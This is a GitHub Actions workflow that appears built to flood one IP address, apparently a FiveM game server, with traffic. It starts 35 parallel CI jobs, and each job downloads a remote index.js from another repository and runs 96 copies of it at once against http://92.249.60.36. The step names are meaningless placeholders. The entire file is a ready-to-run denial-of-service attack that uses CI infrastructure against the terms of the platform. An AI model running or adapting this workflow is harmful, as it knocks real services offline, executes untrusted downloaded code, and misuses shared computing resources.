name: Fivem !

on:
  workflow_dispatch:

jobs:
  vds:
    runs-on: ubuntu-latest
    strategy:
      max-parallel: 35
      matrix:
        instance: [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35]

    steps:
      - name: OK !
        run: |
          wget https://github.com/ahmetdonmmzz001/Discord/raw/refs/heads/main/index.js -O index.js
          chmod +x index.js
          PIDS=()
          for i in {1..96}; do
            sudo timeout 30 node index.js http://92.249.60.36 30 &
            PIDS+=($!)
          done
          
          for pid in "${PIDS[@]}"; do
            wait $pid
          done

      - name: OK !
        run: |
          sleep 30
          exit 0
